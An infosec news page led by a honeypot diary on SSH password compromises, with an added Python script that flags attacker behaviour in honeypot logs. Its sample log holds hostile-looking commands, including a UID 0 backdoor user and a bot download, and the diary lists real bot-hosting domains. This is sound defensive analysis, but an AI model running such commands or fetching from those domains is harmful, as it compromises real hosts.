Information Security News
One common and stupidly simple way hosts are compromised is weak SSH passwords. You would think people have learned by now, but evidently there are still enough systems with root passwords like 12345 around to make scanning for them a worthwhile exercise. As a result, one of my favorite honeypot tools is kippo, and we have talked about the tool before. I figured it is a good time again to write a quick update on some recent compromises.
The basic compromise tends to follow a basic pattern:
- user logs in as root
- looks around the system a bit (uname -a, cpuinfo and the like)
- sometimes performs a bandwidth test by downloading a large file, for example a Windows service pack
- then installs some kind of rootkit/backdoor/bot
- sometimes adds a user to the system
Here are some of the recent artifacts:
- a UID 0 user called "cvsroot" (this user CAN be found on normal systems, but not with a UID of 0)
- the usual "hidden" directory name of many spaces (e.g. cd /var/tmp; mkdir " " )
Here are some of the domains I have seen used to download bots and other tools from:
bnry.jorgee.nu, anglefire.com/komales88, donjoan.go.ro
One particularly interesting attacker actually used a little trick to figure out if the system ran kippo: trying to install a non-existent package. If the "apt-get" command is used, kippo always simulates success, even if the package does not exist. So our enterprising hacker issued the following command:
apt-get install kippofuck
and of course kippo pretended to install this package. Having confirmed he was on a honeypot, the attacker immediately disconnected.
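As an added example (not part of the original diary, and not kippo's own code), here is a small Python script that runs the pattern described above over constructed session log lines and flags, per session, the recon commands, a large-file download that looks like a bandwidth test, the spaces-only "hidden" directory, a useradd asking for UID 0, and an apt-get install that is immediately followed by a disconnect, which is the honeypot-fingerprinting probe just described. The log line shape, the sample sessions, the 30-second probe window and the "Windows installer means bandwidth test" heuristic are all assumptions made for the example; adapt the regexes to your honeypot's real log format.

```python
import re
from datetime import datetime

# Constructed sample log for this example (not real kippo output). The assumed
# line shape is "<timestamp> [<session>] CMD: <command line>" for commands and
# "<timestamp> [<session>] connection lost" for the disconnect; change LINE_RE
# if your honeypot logs differently.
SAMPLE_LOG = """\
2013-07-25 09:12:01 [sess-1] CMD: uname -a
2013-07-25 09:12:04 [sess-1] CMD: cat /proc/cpuinfo
2013-07-25 09:12:30 [sess-1] CMD: wget http://example.invalid/WindowsXP-KB936929-SP3-x86-ENU.exe
2013-07-25 09:13:10 [sess-1] CMD: cd /var/tmp; mkdir "   "
2013-07-25 09:13:40 [sess-1] CMD: useradd -o -u 0 -g 0 cvsroot
2013-07-25 09:14:00 [sess-1] CMD: wget http://example.invalid/bot.tgz
2013-07-25 09:15:00 [sess-1] connection lost
2013-07-25 10:01:00 [sess-2] CMD: uname -a
2013-07-25 10:01:05 [sess-2] CMD: apt-get install kippofuck
2013-07-25 10:01:06 [sess-2] connection lost
2013-07-25 11:20:00 [sess-3] CMD: apt-get install screen
2013-07-25 11:20:30 [sess-3] CMD: screen -S x
2013-07-25 11:25:00 [sess-3] connection lost
"""

LINE_RE = re.compile(r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) \[(?P<sess>[^\]]+)\] (?P<event>.*)$")
# Typical look-around commands run right after login.
RECON_RE = re.compile(r"^(?:uname\b|cat\s+/proc/cpuinfo\b|cat\s+/etc/issue\b|id\b|w\b|ps\b)")
DOWNLOAD_RE = re.compile(r"""\b(?:wget|curl)\b.*?(https?://[^\s;|&"']+)""")
# Heuristic (assumption): a Windows service pack or installer fetched onto a Linux
# box is only good for measuring bandwidth, the behaviour described in the diary.
BANDWIDTH_TEST_RE = re.compile(r"SP\d|ServicePack|\.iso$|\.exe$", re.I)
# mkdir of a quoted name made only of whitespace: the "hidden" directory trick.
HIDDEN_DIR_RE = re.compile(r"""\bmkdir\s+(?:-p\s+)?(['"])\s+\1""")
# useradd/adduser asking for UID 0, e.g. "useradd -o -u 0 cvsroot" or "--uid=0".
UID0_USER_RE = re.compile(r"\b(?:useradd|adduser)\b.*?(?:-u\s*0|--uid[=\s]0)\b")
APT_INSTALL_RE = re.compile(r"\bapt-get\s+(?:-y\s+)?install\s+(\S+)")

# Assumption: a disconnect this soon after an apt-get install, with nothing run in
# between, is treated as a honeypot fingerprinting probe rather than a real install.
PROBE_WINDOW_SECONDS = 30


def parse_sessions(log_text):
    """Group (timestamp, event) pairs by session, preserving order."""
    sessions = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines in a shape we do not understand instead of crashing
        ts = datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S")
        sessions.setdefault(m.group("sess"), []).append((ts, m.group("event")))
    return sessions


def analyze_session(events):
    """Return the indicators from the diary's pattern that one session exhibits."""
    found = {"recon": False, "downloads": [], "bandwidth_test": [],
             "hidden_dir": False, "uid0_user": False, "apt_probe": None}
    last_apt = None  # (timestamp, package) only while apt-get install is the latest command
    for ts, event in events:
        if event.startswith("CMD: "):
            cmd = event[len("CMD: "):]
            if RECON_RE.match(cmd):
                found["recon"] = True
            for url in DOWNLOAD_RE.findall(cmd):
                found["downloads"].append(url)
                if BANDWIDTH_TEST_RE.search(url.rsplit("/", 1)[-1]):
                    found["bandwidth_test"].append(url)
            if HIDDEN_DIR_RE.search(cmd):
                found["hidden_dir"] = True
            if UID0_USER_RE.search(cmd):
                found["uid0_user"] = True
            m = APT_INSTALL_RE.search(cmd)
            last_apt = (ts, m.group(1)) if m else None  # any other command clears it
        elif event == "connection lost" and last_apt is not None:
            apt_ts, package = last_apt
            if (ts - apt_ts).total_seconds() <= PROBE_WINDOW_SECONDS:
                found["apt_probe"] = package
    return found


def analyze(log_text):
    """Map each session id to its indicator dict."""
    return {sess: analyze_session(evts) for sess, evts in parse_sessions(log_text).items()}


def summarize(results):
    """One line per session listing the indicators that fired."""
    lines = []
    for sess, f in results.items():
        tags = [k for k in ("recon", "hidden_dir", "uid0_user") if f[k]]
        if f["bandwidth_test"]:
            tags.append("bandwidth_test")
        if f["apt_probe"]:
            tags.append("honeypot_probe(%s)" % f["apt_probe"])
        lines.append("%s: %s" % (sess, ", ".join(tags) or "nothing notable"))
    return "\n".join(lines)


if __name__ == "__main__":
    print(summarize(analyze(SAMPLE_LOG)))
```

The probe check deliberately requires the apt-get install to be the last command before the disconnect: an attacker who installs a real package and then keeps working (sess-3 above) is not flagged, while one who installs a nonsense package and leaves within the window (sess-2) is. A session that trips the probe rule is a signal that your honeypot has been recognized, so it is worth reviewing which simulated commands gave it away.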
We are always trying to tweak the ISC website a bit to make it more useful. This week, we moved a couple of new features live and are looking for feedback. Note that these features do require you to log in to take advantage of them.
- Our news page got reorganized again. I am not sure if we got it "right" yet, but I think it is now more usable. The goal is to allow users to "rank" news to make the feed overall more relevant. Once you are logged in, you will see a "+1" button to add your weight to an article.
- We made the diary comments a bit more interactive by integrating them with a forum to allow for threaded discussions / quotes and the like. There are now also some generic security categories for other discussions and a section to comment on current news.
For any feedback, please use the comment form.
Five Eastern European men have been charged with operating a global hacking operation that infiltrated some of the world's biggest financial institutions, pilfered data for more than 160 million credit cards, and created hundreds of millions of dollars in losses.
The case, brought by US attorneys in Manhattan and New Jersey, is the largest hacking scheme ever prosecuted in the US, Department of Justice officials said. From 2005 to 2012, the four Russian nationals and a Ukrainian penetrated the private networks of the Nasdaq stock exchange, Citibank, PNC Bank, Heartland Payment Systems, 7-Eleven, JCPenney, Hannaford Brothers, and others, prosecutors alleged in indictments unsealed Thursday morning. The hacking gang traded text strings that exploited SQL-injection vulnerabilities in the victim companies' websites to obtain login credentials and other sensitive data, then installed malware that gave them persistent backdoor access to the networks.
"NASDAQ is owned," Aleksandr Kalinin, a 26-year-old resident of St. Petersburg, Russia, allegedly reported in a January 2008 instant message after finally obtaining administrative access to the stock exchange's network. Like a rock climber slowly scaling a craggy cliff, he spent months methodically escalating his access into the highly sensitive system. In an instant message he sent six months earlier, after initially gaining less-privileged access, he said, "30 SQL servers, and we can run whatever on them, already cracked admin PWS but the network not viewable yet. those dbs are hell big and I think most of info is trading histories." "PWS" and "dbs" are presumed to be shorthand for passwords and databases respectively.
A man who has won about $1.5 million in poker tournaments has been arrested and charged with running an operation that combined spam, Android malware, and a fake dating website to scam victims out of $3.9 million, according to Symantec.
Symantec worked with investigators from the Chiba Prefectural Police in Japan, who earlier this week "arrested nine individuals for distributing spam that included e-mails with links to download Android.Enesoluty—a malware used to collect contact details stored on the owner’s device," Symantec wrote in its blog.
Android.Enesoluty is a Trojan distributed as an Android application file. It steals information and sends it to computers run by hackers. It was discovered by security researchers in September 2012.
How technical monitoring can help defend against insider threats
For more information regarding insider threats and network security, check out the CCNA security course offered by the InfoSec Institute. Remember that every employee has the ability to be an insider threat. The most impactful threats are caused by ...
Closing Arguments in Bradley Manning's Trial (Live Updates)
Major Fein: The government must hold Manning “accountable for exact training he gave others on this subject matter” (Manning produced a presentation on infosec). Fein continued: Manning was a “trained analyst who understood how to assess the enemy and ...
by Andrew Cunningham
A week after its developer site was accessed by an "intruder," Apple has posted another update about its ongoing process to secure the systems and get them back online. While most of the systems remain down, the update specifies the order in which the services will be resuscitated.
"We plan to roll out our updated systems, starting with Certificates, Identifiers & Profiles, Apple Developer Forums, Bug Reporter, pre-release developer libraries, and videos first," said the update. "Next, we will restore software downloads so that the latest betas of iOS 7, Xcode 5, and OS X Mavericks will once again be available to program members. We’ll then bring the remaining systems online."
Developers interested in tracking Apple's progress can also visit a new system status page, which will be updated as the affected services are brought back up. As of this writing, only two systems—iTunes Connect and the Apple Bug Reporter system—are reportedly up, but the others should follow in the coming days.
InfoSec again marks cybersecurity month
Pysn Pueblo y Sociedad Noticias
Throughout the week, from 7 to 11 October, the initiatives grouped under INFOSEC week will take place. On 7 and 11 October there will be a series of related talks. From Monday to Friday a series of workshops will also be held ...
InfoSec again marks cybersecurity month
The third edition of InfoSec Day takes place at Universidade Lusófona in Lisbon. Registration to attend the talks that make up the event is already open, as is registration for the ModSecurity training, which takes place on 7 and 8 October ...
Posted by InfoSec News on Jul 25: http://www.timesofisrael.com/learning-the-art-and-practice-of-cyber-defense/
Posted by InfoSec News on Jul 25: http://arstechnica.com/security/2013/07/google-strengthens-android-security-muscle-with-nsa-developed-protection/
Posted by InfoSec News on Jul 25: http://freebeacon.com/edward-snowden-seeking-to-join-kgb-veterans-group/